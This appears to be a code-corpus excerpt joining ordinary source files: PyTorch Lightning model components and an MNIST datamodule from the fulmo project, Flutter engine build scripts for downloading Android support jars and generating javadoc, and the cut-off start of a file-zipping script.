outputs: Predicted logits.
target: Ground truth labels.
"""
# 1. Calculate predicted classes
y_h_idx = outputs.argmax(dim=-1)
# 2. Filter only correct
mask = torch.eq(y_h_idx, target)
y_h_c = outputs[mask]
y_h_idx_c = y_h_idx[mask]
# 3. Add y_h probabilities rows as columns to `memory`
self.update.index_add_(1, y_h_idx_c, y_h_c.swapaxes(-1, -2))
# 4. Update `idx_count`
self.idx_count.index_add_(0, y_h_idx_c, torch.ones_like(y_h_idx_c, dtype=torch.float32))
def next_epoch(self) -> None:
"""This function should be called at the end of the epoch."""
# 5. Divide memory by `idx_count` to obtain average (column-wise)
self.idx_count[torch.eq(self.idx_count, 0)] = 1 # Avoid 0 denominator
# Normalize by taking the average
self.update /= self.idx_count
self.idx_count.zero_()
self.supervise = self.update
self.update = self.update.clone().zero_()
__all__ = ["OnlineLabelSmoothing"]
```
#### File: models/cv/base.py
```python
import abc
from typing import Dict, Optional, Sequence, Tuple, Union
import timm
import torch
import torch.nn as nn
from ...modules.activation import Mish, Swish
activation_dict = dict(lrelu=nn.LeakyReLU, relu=nn.ReLU, elu=nn.ELU, mish=Mish, swish=Swish, identity=nn.Identity)
class AbstractEncoder(metaclass=abc.ABCMeta):
"""Top layer in nn."""
@property
@abc.abstractmethod
def out_features(self) -> int:
"""Get size of tensor before pooling layer."""
raise NotImplementedError()
@abc.abstractmethod
def extract_features(self, x: torch.Tensor) -> torch.Tensor:
"""Extract features from the `x`."""
raise NotImplementedError()
class AbstractHead(metaclass=abc.ABCMeta):
"""Last layer in nn."""
@abc.abstractmethod
def _init_weights(self) -> None:
"""Initialize layers with some weights."""
raise NotImplementedError()
@abc.abstractmethod
def extract_features(self, x: torch.Tensor) -> torch.Tensor:
"""Extract features from the layers."""
raise NotImplementedError()
@abc.abstractmethod
def in_features(self) -> int:
"""Get size of input for last fc layer."""
raise NotImplementedError()
@abc.abstractmethod
def out_channels(self) -> int:
"""Get size of output for last fc layer."""
raise NotImplementedError()
class Head(AbstractHead, nn.Module):
"""Last layer in nn."""
def __init__(
self,
in_channels: int,
out_channels: int,
activation_name: str = "relu",
num_layers: int = 0,
dropout: float = 0,
activation_parameters: Optional[Dict[str, Union[float, int, str]]] = None,
layers_order: Tuple[str, ...] = ("linear", "bn", "activation", "dropout"),
) -> None:
"""Create a new instance of Head.
Args:
in_channels: size of each input sample.
out_channels: size of each output sample.
activation_name: name of activation.
num_layers: number of block except the last fc with following layers.
dropout: append "Dropout" or not.
activation_parameters: specific parameters for the selected activation type.
layers_order: Order of layers for the head. Default - ("Linear", "BatchNorm", "Activation, "Dropout")
Raises:
KeyError: if `activation_name` does not implemented
ValueError: if `layers_order` contains an unsupported layer.
"""
if activation_name not in activation_dict:
raise KeyError(f"Activation {activation_name} does not implemented")
super().__init__()
self._layers: Sequence[nn.ModuleList] = []
layer_names = layers_order * num_layers
include_bn = "bn" in layers_order
activation_parameters = activation_parameters if activation_parameters else {}
layers = list()
for name in layer_names:
if name == "linear":
out_features = in_channels // 2
layer = nn.Linear(in_features=in_channels, out_features=out_features, bias=not include_bn)
in_channels = out_features
elif name == "bn":
layer = nn.BatchNorm1d(in_channels)
elif name == "activation":
layer = activation_dict[activation_name](**activation_parameters)
elif name == "dropout":
layer = nn.Dropout(p=dropout)
else:
raise ValueError(f"Invalid name of layer - {name}")
layers.append(layer)
self.model = nn.Sequential(*layers)
self.fc = nn.Linear(in_channels, out_channels, bias=not include_bn)
self._init_weights()
@property
def in_features(self) -> int:
"""Get size of input for last fc layer."""
return int(self.fc.in_features)
@property
def out_channels(self) -> int:
"""Get size of output for last fc layer."""
return int(self.fc.out_features)
def _init_weights(self) -> None:
"""Initialize layers with some weights."""
for m in self.modules():
if isinstance(m, nn.Linear):
torch.nn.init.xavier_uniform_(m.weight)
elif isinstance(m, (nn.BatchNorm2d, nn.BatchNorm1d)):
m.weight.data.fill_(1.0)
m.bias.data.zero_()
def extract_features(self, x: torch.Tensor) -> torch.Tensor:
"""Extract features from the layers."""
return self.model(x)
def forward(self, x: torch.Tensor) -> torch.Tensor:
"""Run forward pass."""
x = self.extract_features(x)
x = self.fc(x)
return x
class Encoder(AbstractEncoder, nn.Module):
"""Feature extractor based on `timm` library."""
def __init__(self, name: str, *args, **kwargs) -> None:
"""Create a new instance of Encoder.
Args:
name: A name of models to instantiate.
args: Parameters for timm models.
kwargs: Parameters for timm models.
"""
super(Encoder, self).__init__()
self.model = timm.create_model(name, *args, **kwargs)
self._in_features: int = self.model.num_features
@property
def out_features(self) -> int:
"""Get size of tensor before pooling layer."""
return self._in_features
def extract_features(self, x: torch.Tensor) -> torch.Tensor:
"""Extract features from layers excluding `pool` and `fc` layers."""
return self.model.forward_features(x)
def forward(self, x: torch.Tensor) -> torch.Tensor:
"""Run forward pass."""
x = self.extract_features(x)
return x
__all__ = ["AbstractEncoder", "Encoder", "Head"]
```
#### File: fulmo/models/__init__.py
```python
import importlib
import os
from typing import Any, Callable
from .interface import BaseModel
MODEL_REGISTRY = dict()
MODEL_DATACLASS_REGISTRY = dict()
def register_model(name: str, dataclass: object = None) -> Callable:
"""New model types can be added to Fulmo with the :func:`register_model` function decorator.
For example::
@register_model('image_classification')
class ImageClassificationModel(BaseModel):
(...)
.. note:: All models must implement the :class:`cls.__name__` interface.
Args:
name: a name of the model
dataclass: a config of the model
Returns:
A decorator function to register models.
"""
def _register_model_cls(cls: Any) -> Any:
"""Add a model to a registry."""
if name in MODEL_REGISTRY:
raise ValueError(f"Cannot register duplicate model ({name})")
if not issubclass(cls, BaseModel):
raise ValueError(f"Model ({name}: {cls.__name__}) must extend FulmoModel")
MODEL_REGISTRY[name] = cls
cls.__dataclass = dataclass
if dataclass is not None:
if name in MODEL_DATACLASS_REGISTRY:
raise ValueError(f"Cannot register duplicate model ({name})")
MODEL_DATACLASS_REGISTRY[name] = dataclass
return cls
return _register_model_cls
# automatically import any Python files in the models/ directory
models_dir = os.path.dirname(__file__)
for file in os.listdir(models_dir):
if os.path.isdir(os.path.join(models_dir, file)) and not file.startswith("__"):
for subfile in os.listdir(os.path.join(models_dir, file)):
path = os.path.join(models_dir, file, subfile)
if subfile.endswith(".py"):
python_file = subfile[: subfile.find(".py")] if subfile.endswith(".py") else subfile
module = importlib.import_module(f"fulmo.models.{file}.{python_file}")
continue
path = os.path.join(models_dir, file)
if file.endswith(".py"):
model_name = file[: file.find(".py")] if file.endswith(".py") else file
module = importlib.import_module(f"fulmo.models.{model_name}")
```
#### File: modules/activation/swish.py
```python
import torch
import torch.nn as nn
from .functional import swish
class Swish(nn.Module):
"""Swish activation function. https://arxiv.org/abs/1710.05941"""
def __init__(self, beta: float = 1.0) -> None:
"""Create a new instance of Swish operator."""
super(Swish, self).__init__()
self.beta = beta
def forward(self, x: torch.Tensor) -> torch.Tensor:
"""Run forward pass."""
return swish(x, self.beta)
__all__ = ["Swish"]
```
#### File: modules/pooling/functional.py
```python
import torch
import torch.nn.functional as F
def adaptive_avgmax_pool2d(x: torch.Tensor, output_size: int = 1) -> torch.Tensor:
"""Apply avg and max pooling and mean result."""
x_avg = F.adaptive_avg_pool2d(x, output_size)
x_max = F.adaptive_max_pool2d(x, output_size)
return x_avg + x_max
def adaptive_catavgmax_pool2d(x: torch.Tensor, output_size: int = 1) -> torch.Tensor:
"""Apply avg and max pooling and concatenate it into one tensor."""
x_avg = F.adaptive_avg_pool2d(x, output_size)
x_max = F.adaptive_max_pool2d(x, output_size)
return torch.cat((x_avg, x_max), 1)
__all__ = ["adaptive_avgmax_pool2d", "adaptive_catavgmax_pool2d"]
```
#### File: modules/pooling/pyramid.py
```python
import math
from typing import Tuple
import torch
import torch.nn as nn
import torch.nn.functional as F
class PyramidPooling(nn.Module):
"""Spatial Pyramid Pooling in Deep Convolutional Networks for Visual Recognition. https://arxiv.org/abs/1406.4729"""
def __init__(self, levels: Tuple[int, ...], mode: str = "max") -> None:
"""General Pyramid Pooling class which uses Spatial Pyramid Pooling by default.
And holds the static methods for both spatial and temporal pooling.
Args:
levels: defines the different divisions to be made in the width and (spatial) height dimension
mode: defines the underlying pooling mode to be used, can either be "max" or "avg"
"""
super(PyramidPooling, self).__init__()
self.levels = levels
self.mode = mode
@staticmethod
def spatial_pyramid_pool(previous_conv: torch.Tensor, levels: Tuple[int, ...], mode: str) -> torch.Tensor:
"""Apply Static Spatial Pyramid Pooling method, which divides the input Tensor vertically and horizontally.
(last 2 dimensions) according to each level in the given levels and pools its value according to the given mode.
Args:
previous_conv: input tensor of the previous convolutional layer
levels: defines the different divisions to be made in the width and height dimension
mode: defines the underlying pooling mode to be used, can either be "max" or "avg"
Returns:
a tensor vector with shape [batch x 1 x n],
where n: sum(filter_amount*level*level) for each level in levels
which is the concentration of multi-level pooling
Raises:
ValueError: if mode not in ("avg", "max")
"""
num_sample = previous_conv.size(0)
previous_conv_size = [int(previous_conv.size(2)), int(previous_conv.size(3))]
for i in range(len(levels)):
h_kernel = int(math.ceil(previous_conv_size[0] / levels[i]))
w_kernel = int(math.ceil(previous_conv_size[1] / levels[i]))
w_pad1 = int(math.floor((w_kernel * levels[i] - previous_conv_size[1]) / 2))
w_pad2 = int(math.ceil((w_kernel * levels[i] - previous_conv_size[1]) / 2))
h_pad1 = int(math.floor((h_kernel * levels[i] - previous_conv_size[0]) / 2))
h_pad2 = int(math.ceil((h_kernel * levels[i] - previous_conv_size[0]) / 2))
assert w_pad1 + w_pad2 == (w_kernel * levels[i] - previous_conv_size[1]) and h_pad1 + h_pad2 == (
h_kernel * levels[i] - previous_conv_size[0]
)
padded_input = F.pad(input=previous_conv, pad=[w_pad1, w_pad2, h_pad1, h_pad2], mode="constant", value=0)
if mode == "max":
pool = nn.MaxPool2d((h_kernel, w_kernel), stride=(h_kernel, w_kernel), padding=(0, 0))
elif mode == "avg":
pool = nn.AvgPool2d((h_kernel, w_kernel), stride=(h_kernel, w_kernel), padding=(0, 0))
else:
raise ValueError('Unknown pooling type: %s, please use "max" or "avg".')
x = pool(padded_input)
if i == 0:
spp = x.view(num_sample, -1)
else:
spp = torch.cat((spp, x.view(num_sample, -1)), 1)
return spp
@staticmethod
def temporal_pyramid_pool(previous_conv: torch.Tensor, out_pool_size: Tuple[int, ...], mode: str) -> torch.Tensor:
"""Apply Static Temporal Pyramid Pooling method, which divides the input Tensor horizontally (last dimensions).
According to each level in the given levels and pools its value according to the given mode.
In other words: It divides the Input Tensor in "level" horizontal stripes with width of roughly
and the original height and pools the values inside this stripe
Args:
previous_conv: input tensor of the previous convolutional layer
out_pool_size: defines the different divisions to be made in the width dimension
mode: defines the underlying pooling mode to be used, can either be "max" or "avg"
Returns:
a tensor vector with shape [batch x 1 x n],
where n: sum(filter_amount*level) for each level in levels
which is the concentration of multi-level pooling
Raises:
ValueError: if mode not in ("avg", "max")
"""
num_sample = previous_conv.size(0)
previous_conv_size = [int(previous_conv.size(2)), int(previous_conv.size(3))]
for i in range(len(out_pool_size)):
h_kernel = previous_conv_size[0]
w_kernel = int(math.ceil(previous_conv_size[1] / out_pool_size[i]))
w_pad1 = int(math.floor((w_kernel * out_pool_size[i] - previous_conv_size[1]) / 2))
w_pad2 = int(math.ceil((w_kernel * out_pool_size[i] - previous_conv_size[1]) / 2))
assert w_pad1 + w_pad2 == (w_kernel * out_pool_size[i] - previous_conv_size[1])
padded_input = F.pad(input=previous_conv, pad=[w_pad1, w_pad2], mode="constant", value=0)
if mode == "max":
pool = nn.MaxPool2d((h_kernel, w_kernel), stride=(h_kernel, w_kernel), padding=(0, 0))
elif mode == "avg":
pool = nn.AvgPool2d((h_kernel, w_kernel), stride=(h_kernel, w_kernel), padding=(0, 0))
else:
raise ValueError('Unknown pooling type: %s, please use "max" or "avg".')
x = pool(padded_input)
if i == 0:
tpp = x.view(num_sample, -1)
else:
tpp = torch.cat((tpp, x.view(num_sample, -1)), 1)
return tpp
def forward(self, x: torch.Tensor) -> torch.Tensor:
"""Run forward pass."""
return self.spatial_pyramid_pool(x, self.levels, self.mode)
def get_output_size(self, filters: int) -> int:
"""Calculate the output shape given a filter_amount: sum(filter_amount*level*level) for each level in levels.
Can be used to x.view(-1, spp.get_output_size(filter_amount)) for the fully-connected layers
Args:
filters: the amount of filter of output fed into the spatial pyramid pooling
Returns:
sum(filter_amount*level*level)
"""
out = 0
for level in self.levels:
out += filters * level * level
return out
class SpatialPyramidPooling(PyramidPooling):
"""Spatial Pyramid Pooling in Deep Convolutional Networks for Visual Recognition https://arxiv.org/abs/1406.4729"""
def __init__(self, levels: Tuple[int, ...], mode: str = "max") -> None:
"""Spatial Pyramid Pooling Module, which divides the input Tensor horizontally and horizontally.
(last 2 dimensions) according to each level in the given levels and pools its value according to the given mode.
Can be used as every other pytorch Module and has no learnable parameters since it's a static pooling.
and height of roughly (previous_conv.size(2) / level) and pools its value. (pads input to fit)
Args:
levels: defines the different divisions to be made in the width dimension
mode: defines the underlying pooling mode to be used, can either be "max" or "avg"
"""
super(SpatialPyramidPooling, self).__init__(levels, mode=mode)
def forward(self, x: torch.Tensor) -> torch.Tensor:
"""Run forward pass."""
return self.spatial_pyramid_pool(x, self.levels, self.mode)
def get_output_size(self, filters: int) -> int:
"""Calculate the output shape given a filter_amount: sum(filter_amount*level*level) for each level in levels.
Can be used to x.view(-1, spp.get_output_size(filter_amount)) for the fully-connected layers
Args:
filters: the amount of filter of output fed into the spatial pyramid pooling
Returns:
sum(filter_amount*level*level)
"""
out = 0
for level in self.levels:
out += filters * level * level
return out
__all__ = ["SpatialPyramidPooling"]
```
#### File: fulmo/readers/label.py
```python
from typing import Dict, Optional, Union
import numpy as np
from ..utils.type_hints import IntegerScalar, NPType
from .base import IReader
from .functional import get_one_hot
class ScalarReader(IReader):
"""Numeric loader readers abstraction. Reads a single float, int, str or other from loader."""
def __init__(
self,
input_key: str,
output_key: str,
dtype: NPType = np.float32,
default_value: float = -1.0,
one_hot_classes: Optional[int] = None,
smoothing: Optional[float] = None,
) -> None:
"""Create a new instance of ScalarReader.
Args:
input_key: input key to use from annotation dict
output_key: output key to use to store the result
dtype: datatype of scalar values to use
default_value: default value to use if something goes wrong
one_hot_classes: number of one-hot classes
smoothing: if specified applies label smoothing to one_hot classes
"""
super().__init__(input_key, output_key)
self.dtype = dtype
self.default_value = default_value
self.one_hot_classes = one_hot_classes
self.smoothing = smoothing
if one_hot_classes is not None and smoothing is not None:
assert 0.0 < smoothing < 1.0, f"If smoothing is specified it must be in (0; 1), " f"got {smoothing}"
def __call__(self, element: Dict[str, Union[int, float, IntegerScalar]]) -> Dict[str, IntegerScalar]:
"""Read a row from your annotations dict and transfer it to a single value.
Args:
element: elem in your datasets
Returns:
dtype: Scalar value
"""
scalar = self.dtype(element.get(self.input_key, self.default_value))
if self.one_hot_classes is not None:
scalar = get_one_hot(scalar, self.one_hot_classes, smoothing=self.smoothing)
output = {self.output_key: scalar}
return output
__all__ = ["ScalarReader"]
```
#### File: fulmo/fulmo/settings.py
```python
from enum import Enum
from typing import Optional, Union
from .utils.frozen_class import FrozenClass
from .utils.logging import get_logger
class Stage(str, Enum):
"""Stage names related to `pytorch-lightning` naming convention."""
train = "train"
val = "val"
test = "test"
predict = "predict"
def __eq__(self, other: Union[str, Enum]) -> bool: # type: ignore[override]
other = other.value if isinstance(other, Enum) else str(other)
return self.value.lower() == other.lower()
def __hash__(self) -> int:
# re-enable hashtable so it can be used as a dict key or in a set
# example: set(LightningEnum)
return hash(self.name)
@classmethod
def from_str(cls, value: str) -> Optional["Stage"]:
"""Create a new instance of `Stage` from string."""
statuses = [status for status in dir(cls) if not status.startswith("_")]
for st in statuses:
if st.lower() == value.lower():
return getattr(cls, st) # type: ignore[no-any-return]
return None
class Settings(FrozenClass):
"""Settings for the entire project."""
def __init__(
self,
mix_target_key: str = "mixed_target",
mix_lam_a_key: str = "lam_a",
mix_lam_b_key: str = "lam_b",
) -> None:
self.mix_target_key = mix_target_key
self.mix_lam_a_key = mix_lam_a_key
self.mix_lam_b_key = mix_lam_b_key
DEFAULT_SETTINGS = Settings()
logger = get_logger("global")
__all__ = ["DEFAULT_SETTINGS", "Settings", "Stage", "logger"]
```
#### File: lightning/utils/helpers.py
```python
from typing import Any, Dict, Optional, Tuple
import numpy as np
import torch
from pytorch_lightning import LightningDataModule, LightningModule
from torch.utils.data import DataLoader, Dataset, IterableDataset, Subset
from fulmo.readers import IReader
class RandomDictDataset(Dataset):
def __init__(self, size: int, length: int):
self.len = length
self.data = torch.randn(length, size)
def __getitem__(self, index):
a = self.data[index]
b = a + 2
return {"a": a, "b": b}
def __len__(self):
return self.len
class RandomDataset(Dataset):
def __init__(self, size: int, length: int):
self.len = length
self.data = torch.randn(length, size)
def __getitem__(self, index):
return self.data[index]
def __len__(self):
return self.len
class RandomIterableDataset(IterableDataset):
def __init__(self, size: int, count: int):
self.count = count
self.size = size
def __iter__(self):
for _ in range(self.count):
yield torch.randn(self.size)
class RandomIterableDatasetWithLen(IterableDataset):
def __init__(self, size: int, count: int):
self.count = count
self.size = size
def __iter__(self):
for _ in range(len(self)):
yield torch.randn(self.size)
def __len__(self):
return self.count
class NpyGenerator(IReader):
"""Npy array readers abstraction. Reads arrays from a ``csv`` datasets."""
def __init__(
self,
input_key: Optional[str] = None,
output_key: Optional[str] = None,
shape: Tuple[int, int, int] = (256, 256, 3),
) -> None:
"""Create a new instance of NpyReader.
Args:
input_key: key to use from annotation dict
output_key: key to use to store the result
"""
super().__init__(input_key, output_key or input_key)
self.shape = shape
def __call__(self, element: Dict[str, Any]) -> Dict[str, np.ndarray]:
"""Generate random array and transfer it.
Args:
element: elem in your datasets
Returns:
Dict[`output_key`, np.ndarray]
"""
array = np.random.rand(*self.shape)
output = {self.output_key: array}
return output
class TestModel(torch.nn.Module):
def __init__(self):
super().__init__()
self.backbone = torch.nn.Sequential(
torch.nn.Linear(32, 32),
torch.nn.ReLU(),
torch.nn.Dropout(),
)
self.head = torch.nn.Sequential(
torch.nn.Linear(32, 16),
torch.nn.Dropout(0.5),
torch.nn.ReLU(),
torch.nn.Linear(16, 8),
torch.nn.Dropout(0.5),
torch.nn.ReLU(),
torch.nn.Linear(8, 2),
)
def forward(self, x):
return self.head(self.backbone(x))
class BoringModel(LightningModule):
def __init__(self):
"""
Testing PL Module
Use as follows:
- subclass
- modify the behavior for what you want
class TestModel(BaseTestModel):
def training_step(...):
# do your own thing
or:
model = BaseTestModel()
model.training_epoch_end = None
"""
super().__init__()
self.model = TestModel()
self._train_data = DataLoader(RandomDataset(32, 64))
self._val_data = DataLoader(RandomDataset(32, 64))
self._test_data = DataLoader(RandomDataset(32, 64))
self._predict_data = DataLoader(RandomDataset(32, 64))
def set_train_data(self, value) -> None:
self._train_data = value
def set_val_data(self, value) -> None:
self._val_data = value
def set_test_data(self, value) -> None:
self._test_data = value
def set_predict_data(self, value) -> None:
self._predict_data = value
def forward(self, x):
return self.model(x)
def loss(self, batch, prediction):
# An arbitrary loss to have a loss that updates the model weights during `Trainer.fit` calls
return torch.nn.functional.mse_loss(prediction, torch.ones_like(prediction))
def step(self, x):
x = self(x)
out = torch.nn.functional.mse_loss(x, torch.ones_like(x))
return out
def training_step(self, batch, batch_idx):
output = self(batch)
loss = self.loss(batch, output)
return {"loss": loss}
def training_step_end(self, training_step_outputs):
return training_step_outputs
def training_epoch_end(self, outputs) -> None:
torch.stack([x["loss"] for x in outputs]).mean()
def validation_step(self, batch, batch_idx):
output = self(batch)
loss = self.loss(batch, output)
return {"x": loss}
def validation_epoch_end(self, outputs) -> None:
torch.stack([x["x"] for x in outputs]).mean()
def test_step(self, batch, batch_idx):
output = self(batch)
loss = self.loss(batch, output)
return {"y": loss}
def test_epoch_end(self, outputs) -> None:
torch.stack([x["y"] for x in outputs]).mean()
def configure_optimizers(self):
optimizer = torch.optim.SGD(self.model.parameters(), lr=0.1)
lr_scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=1)
return [optimizer], [lr_scheduler]
def train_dataloader(self):
return self._train_data
def val_dataloader(self):
return self._val_data
def test_dataloader(self):
return self._test_data
def predict_dataloader(self):
return self._predict_data
class BoringDataModule(LightningDataModule):
def __init__(self, data_dir: str = "./"):
super().__init__()
self.data_dir = data_dir
self.non_picklable = None
self.checkpoint_state: Optional[str] = None
def prepare_data(self):
self.random_full = RandomDataset(32, 64 * 4)
def setup(self, stage: Optional[str] = None):
if stage == "fit" or stage is None:
self.random_train = Subset(self.random_full, indices=range(64))
self.dims = self.random_train[0].shape
if stage in ("fit", "validate") or stage is None:
self.random_val = Subset(self.random_full, indices=range(64, 64 * 2))
if stage == "test" or stage is None:
self.random_test = Subset(self.random_full, indices=range(64 * 2, 64 * 3))
self.dims = getattr(self, "dims", self.random_test[0].shape)
if stage == "predict" or stage is None:
self.random_predict = Subset(self.random_full, indices=range(64 * 3, 64 * 4))
self.dims = getattr(self, "dims", self.random_predict[0].shape)
def train_dataloader(self):
return DataLoader(self.random_train)
def val_dataloader(self):
return DataLoader(self.random_val)
def test_dataloader(self):
return DataLoader(self.random_test)
def predict_dataloader(self):
return DataLoader(self.random_predict)
__all__ = ["BoringModel", "NpyGenerator"]
```
|
{
"source": "jexio/mnist",
"score": 2
}
|
#### File: mnist/datamodules/base.py
```python
import logging
import os
import random
import time
from typing import Dict, List, Optional, Tuple, Union, Any, Callable
import urllib
import torch
from torchvision.datasets import MNIST
from torchvision import transforms as transform_lib
from torch.utils.data import DataLoader, Dataset, random_split
from fulmo.core import BaseDataModule, BaseDataModuleParameters
from fulmo.settings import Stage
class _MNIST(Dataset):
"""Carbon copy of ``tests.helpers.datasets.MNIST``.
We cannot import the tests as they are not distributed with the package.
See https://github.com/PyTorchLightning/pytorch-lightning/pull/7614#discussion_r671183652 for more context.
"""
RESOURCES = (
"https://pl-public-data.s3.amazonaws.com/MNIST/processed/training.pt",
"https://pl-public-data.s3.amazonaws.com/MNIST/processed/test.pt",
)
TRAIN_FILE_NAME = "training.pt"
TEST_FILE_NAME = "test.pt"
cache_folder_name = "complete"
def __init__(
self, root: str, train: bool = True, normalize: tuple = (0.1307, 0.3081), download: bool = True, **kwargs
):
super().__init__()
self.root = root
self.train = train # training set or test set
self.normalize = normalize
self.prepare_data(download)
data_file = self.TRAIN_FILE_NAME if self.train else self.TEST_FILE_NAME
self.data, self.targets = self._try_load(os.path.join(self.cached_folder_path, data_file))
def __getitem__(self, idx: int) -> Tuple[torch.Tensor, int]:
img = self.data[idx].float().unsqueeze(0)
target = int(self.targets[idx])
if self.normalize is not None and len(self.normalize) == 2:
img = self.normalize_tensor(img, *self.normalize)
return img, target
def __len__(self) -> int:
return len(self.data)
@property
def cached_folder_path(self) -> str:
return os.path.join(self.root, "MNIST", self.cache_folder_name)
def _check_exists(self, data_folder: str) -> bool:
existing = True
for fname in (self.TRAIN_FILE_NAME, self.TEST_FILE_NAME):
existing = existing and os.path.isfile(os.path.join(data_folder, fname))
return existing
def prepare_data(self, download: bool = True):
if download and not self._check_exists(self.cached_folder_path):
self._download(self.cached_folder_path)
if not self._check_exists(self.cached_folder_path):
raise RuntimeError("Dataset not found.")
def _download(self, data_folder: str) -> None:
os.makedirs(data_folder, exist_ok=True)
for url in self.RESOURCES:
logging.info(f"Downloading {url}")
fpath = os.path.join(data_folder, os.path.basename(url))
urllib.request.urlretrieve(url, fpath)
@staticmethod
def _try_load(path_data, trials: int = 30, delta: float = 1.0):
"""Resolving loading from the same time from multiple concurrent processes."""
res, exception = None, None
assert trials, "at least some trial has to be set"
assert os.path.isfile(path_data), f"missing file: {path_data}"
for _ in range(trials):
try:
res = torch.load(path_data)
# todo: specify the possible exception
except Exception as e:
exception = e
time.sleep(delta * random.random())
else:
break
if exception is not None:
# raise the caught exception
raise exception
return res
@staticmethod
def normalize_tensor(tensor: torch.Tensor, mean: float = 0.0, std: float = 1.0) -> torch.Tensor:
mean = torch.as_tensor(mean, dtype=tensor.dtype, device=tensor.device)
std = torch.as_tensor(std, dtype=tensor.dtype, device=tensor.device)
return tensor.sub(mean).div(std)
class MnistDataModule(BaseDataModule):
"""Standard MNIST, train, val, test splits and transforms.
Attributes:
data_dir: where to save/load the data
val_split: how many of the training images to use for the validation split
seed: starting seed for RNG.
"""
def __init__(
self,
data_dir: str,
parameters: Dict[str, BaseDataModuleParameters],
val_split: int = 5000,
seed: int = 42,
) -> None:
"""Create a new instance of MnistDataModule."""
super().__init__(data_dir, parameters)
self.data_dir = data_dir
self.val_split = val_split
self.normalize = True
self.seed = seed
def prepare_data(self):
"""Saves MNIST files to `data_dir`"""
MNIST(self.data_dir, train=True, download=True)
MNIST(self.data_dir, train=False, download=True)
def setup(self, stage: Optional[str] = None):
"""Split the train and valid dataset."""
extra = dict(transform=self.default_transforms) if self.default_transforms else {}
dataset = MNIST(self.data_dir, train=True, download=False, **extra)
train_length = len(dataset)
self.data_train, self.data_val = random_split(dataset, [train_length - self.val_split, self.val_split])
self.data_test = MNIST(self.data_dir, train=False, download=False, **extra)
@property
def collate_fn(self) -> Optional[Callable[[Dict[str, Any]], Dict[str, torch.Tensor]]]:
"""Get collate_fn."""
def collate(data):
data, labels = zip(*data)
data = torch.cat(data).unsqueeze(1)
labels = torch.tensor(labels)
return {"features": data, "target": labels}
return collate
@property
def default_transforms(self):
if self.normalize:
mnist_transforms = transform_lib.Compose(
[transform_lib.ToTensor(), transform_lib.Normalize(mean=(0.5,), std=(0.5,))]
)
else:
mnist_transforms = transform_lib.ToTensor()
return mnist_transforms
__all__ = ["MnistDataModule"]
```
#### File: mnist/utils/registry.py
```python
import os
import importlib
def registry(path: str, name: str) -> None:
"""Register entire folder
Args:
path: A path to __init__ file.
name: A module name.
"""
module_dir = os.path.dirname(path)
for file in os.listdir(module_dir):
if os.path.isdir(os.path.join(module_dir, file)) and file != '__pycache__':
for subfile in os.listdir(os.path.join(module_dir, file)):
_ = os.path.join(module_dir, file, subfile)
if subfile.endswith(".py"):
class_name = subfile[: subfile.find(".py")] if subfile.endswith(".py") else subfile
_ = importlib.import_module(f"{name}.{class_name}")
continue
_ = os.path.join(module_dir, file)
if file.endswith(".py"):
class_name = file[: file.find(".py")] if file.endswith(".py") else file
_ = importlib.import_module(f"{name}.{class_name}")
__all__ = ["registry"]
```
|
{
"source": "jexme/engine",
"score": 2
}
|
#### File: tools/android_support/download_android_support.py
```python
import os
import sys
import urllib2
import cStringIO
import zipfile
import json
# Path constants. (All of these should be absolute paths.)
THIS_DIR = os.path.abspath(os.path.dirname(__file__))
FLUTTER_DIR = os.path.abspath(os.path.join(THIS_DIR, '..', '..', '..'))
INSTALL_DIR = os.path.join(FLUTTER_DIR, 'third_party', 'android_support')
def GetInstalledVersion(out_file_name):
version_file = os.path.join(INSTALL_DIR, out_file_name + '.stamp')
if not os.path.exists(version_file):
return None
with open(version_file) as f:
return f.read().strip()
def getFile(url, out_file_name):
# Read latest version.
if url == GetInstalledVersion(out_file_name):
return
downloaded_file = urllib2.urlopen(url).read()
if not os.path.exists(INSTALL_DIR):
os.mkdir(INSTALL_DIR)
if (url.endswith('.aar')):
aar_zip = zipfile.ZipFile(cStringIO.StringIO(downloaded_file))
with open(os.path.join(INSTALL_DIR, out_file_name), 'w') as f:
f.write(aar_zip.read('classes.jar'))
else:
with open(os.path.join(INSTALL_DIR, out_file_name), 'w') as f:
f.write(downloaded_file)
# Write version as the last step.
with open(os.path.join(INSTALL_DIR, out_file_name + '.stamp'), 'w') as f:
f.write('%s\n' % url)
def main():
with open (os.path.join(THIS_DIR, 'files.json')) as f:
files = json.load(f)
for entry in files:
getFile(entry['url'], entry['out_file_name'])
if __name__ == '__main__':
sys.exit(main())
```
#### File: engine/tools/gen_javadoc.py
```python
import argparse
import os
import subprocess
import sys
ANDROID_SRC_ROOT = 'flutter/shell/platform/android'
def main():
if not os.path.exists(ANDROID_SRC_ROOT):
print 'This script must be run at the root of the Flutter source tree'
return 1
parser = argparse.ArgumentParser(description='Runs javadoc on Flutter Android libraries')
parser.add_argument('--out-dir', type=str, required=True)
args = parser.parse_args()
if not os.path.exists(args.out_dir):
os.makedirs(args.out_dir)
classpath = [
ANDROID_SRC_ROOT,
'third_party/android_support/android_arch_lifecycle_common.jar',
'third_party/android_support/android_arch_lifecycle_viewmodel.jar',
'third_party/android_support/android_support_annotations.jar',
'third_party/android_support/android_support_compat.jar',
'third_party/android_support/android_support_fragment.jar',
'third_party/android_support/android_support_v13.jar',
'third_party/android_tools/sdk/platforms/android-29/android.jar',
'base/android/java/src',
'third_party/jsr-305/src/ri/src/main/java',
]
packages = [
'io.flutter.app',
'io.flutter.embedding.android',
'io.flutter.embedding.engine',
'io.flutter.embedding.engine.dart',
'io.flutter.embedding.engine.renderer',
'io.flutter.embedding.engine.systemchannels',
'io.flutter.plugin.common',
'io.flutter.plugin.editing',
'io.flutter.plugin.platform',
'io.flutter.util',
'io.flutter.view',
]
command = [
'javadoc',
'-classpath', ':'.join(classpath),
'-d', args.out_dir,
'-link', 'https://developer.android.com/reference/',
] + packages
print(' '.join(command))
return subprocess.call(command)
if __name__ == '__main__':
sys.exit(main())
```
|
{
"source": "Jexocn/python_scripts",
"score": 3
}
|
#### File: Jexocn/python_scripts/zipfiles.py
```python
import os
import sys
import subprocess
import re
import glob
ignores = ['.git']
def fnames_filter(fnames):
for fname in ignores:
if fname in fnames:
fnames.remove(fname)
def gen_zipfile_name(dirname, start_id):
while True:
zipfname = os.path.join(dirname, "{:05d}.7z".format(start_id))
if not os.path.exists(zipfname) and len(glob.glob("{0}.[0-9][0-9]*".format(zipfname))) == 0:
return zipfname, start_id + 1
start_id += 1
def zip_file(dirname, fname, id_dict):
full_path = os.path.join(dirname, fname)
if os.path.isfile(full_path) and full_path != self_path:
r = re.search("\.7z(\.\d+)?$", fname)
